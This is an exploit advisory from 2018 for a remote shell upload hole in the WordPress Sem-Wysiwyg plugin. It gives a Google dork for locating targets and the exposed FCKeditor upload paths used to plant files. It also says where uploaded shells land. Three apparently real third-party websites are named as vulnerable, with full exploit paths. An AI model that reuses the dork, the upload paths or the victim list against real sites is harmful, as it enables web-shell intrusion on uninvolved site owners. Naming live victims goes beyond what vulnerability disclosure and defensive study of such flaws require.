facebook facebook twitter rss

WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload Vulnerability

Author: KingSkrupellos , Published: 21-12-2018
#################################################################################################

# Exploit Title : WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/12/2018
# Vendor Homepage : wordpress.org
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/sem-wysiwyg/fckeditor/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-434- [ Unrestricted Upload of File with Dangerous Type ]
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]

#################################################################################################

# Exploit :

/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html

/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/connectors/test.html

/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/frmupload.html

# Directory File Path :

/wp-content/uploads/.....

/wp-content/uploads/[YEAR]/[MONTH]/.....

#################################################################################################

# Note : This plugin Sem-Wysiwyg contains a very serious vulnerability that allowed hackers to gain full control –

modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website,

a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin’s directory.

#################################################################################################

# Example Vulnerable Sites =>

[+] peaceofmindbook.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html

[+] americanpathways.edu/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html

[+] worklessmakemore.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :